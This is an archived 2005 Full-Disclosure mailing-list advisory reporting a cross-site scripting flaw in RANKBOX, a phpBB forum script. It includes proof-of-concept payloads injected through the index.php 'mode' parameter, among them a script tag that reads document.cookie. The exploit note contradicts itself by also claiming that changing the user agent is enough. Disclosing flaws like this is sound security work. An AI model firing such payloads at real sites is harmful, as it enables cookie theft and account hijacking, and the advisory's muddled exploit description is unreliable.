[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] RANKBOX <= XSS vulnerability

To: pen-test@xxxxxxxxxxxxxxxxxxxxxxx, vuln-dev@xxxxxxxxxxxxxxxxx, pen-test@xxxxxxxxxxxxxxxxx, security-basics@xxxxxxxxxxxxxxxxx, nmap-hackers@xxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] RANKBOX <= XSS vulnerability
From: "spyburn mexico rlz" <spy-burn@xxxxxxxxxxx>
Date: Mon, 07 Nov 2005 13:29:41 -0800

##################################################################################### # # # Advisory #1 Title: # # "RANKBOX <= XSS vulnerability" # # # # Author: spyburn # # Contact: spy-burn@xxxxxxxxxxx # # Website: elitemexico.org # # Date: 07/11/2005 # # Risk: High # # Vendor Url: http://chamberofgold.com # # Affected Software: RANKBOX # # Non Affected: # # # # We Are: ELITE MEXICO # ##################################################################################### ---------------------------------------------------------

:: Description ::
script for forums phpbb

---------------------------------------------------------
####################
:: Vulnerabilitie ::
####################
- | "xss" | -

directori afeccted is /index.php?mode=<IMG SRC=http://site.com/image.jpg> /index.php?mode=<script>alert(document.cookie)</script> -------------------------------------------------------- ############ ::Exploit:: ############ no exploit is requiered, the only think you need to do is change your user agent


----------------------------------------------------------
#######
GREETZ
#######
Visit: www.elitemexico.org

greetz: raza mexicana, mexican hackers mafia , cum, fraude, 0o_zeus_o0
#############################################################

_________________________________________________________________ MSN Premium. Protégete, Comunícate y Diviértete http://join.msn.com/?pgmarket=es-mx&page=byoa/prem&xAPID=989&DI=233&SU=http://www.t1msn.com.mx/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Re: readdir_r considered harmful
Next by Date: Re: [Full-disclosure] Security Updates Without Rebooting
Previous by thread: [Full-disclosure] MDKSA-2005:205 - Updated clamav packages fix multiple vulnerabilities
Next by thread: [Full-disclosure] [SECURITY] [DSA 889-1] New enigmail packages fix information disclosure
Index(es):
- Date
- Thread